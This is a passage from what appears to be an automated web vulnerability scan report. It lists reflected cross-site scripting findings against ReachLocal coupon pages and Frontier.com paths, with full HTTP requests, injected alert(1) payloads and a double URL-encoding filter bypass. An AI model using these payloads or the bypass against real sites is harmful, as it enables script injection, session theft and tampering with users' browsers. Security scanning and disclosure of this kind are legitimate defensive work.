Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
ass="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup(
...[SNIP]...
|
2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d338"><script>alert(1)</script>ad1ca6e1bfb was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:59 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=23329
...[SNIP]...
|
2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56381"><script>alert(1)</script>70d89b3bb75 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:49 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...
|
2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4a6"><script>alert(1)</script>d1455ccc13a was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:01 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
2&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary
...[SNIP]...
|
2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d28"><script>alert(1)</script>56378b08b00 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...
|
2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309b3"><script>alert(1)</script>4eadda684d was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3261
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971
...[SNIP]...
|
2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/d837/837045/index5.html |
Issue detail
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b54e"><script>alert(1)</script>9fb0f72f32a was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:47 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ReachLocal Index</title>
<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...
|
2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrdering/CustomAppTabInfo/tabs.css |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a54%2527%253balert%25281%2529%252f%252f24407793c50 was submitted in the REST URL parameter 1. This input was echoed as 59a54';alert(1)//24407793c50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering59a54%2527%253balert%25281%2529%252f%252f24407793c50/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering59a54';alert(1)//24407793c50/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...
|
2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrdering/CustomAppTabInfo/tabs.css |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3 was submitted in the REST URL parameter 2. This input was echoed as 760b6';alert(1)//951f3ddd7d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo760b6';alert(1)//951f3ddd7d3/tabs.css');//]]>
...[SNIP]...
|
2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrdering/CustomAppTabInfo/tabs.css |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 was submitted in the REST URL parameter 3. This input was echoed as aeffb';alert(1)//9b1214b2e90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo/tabs.cssaeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
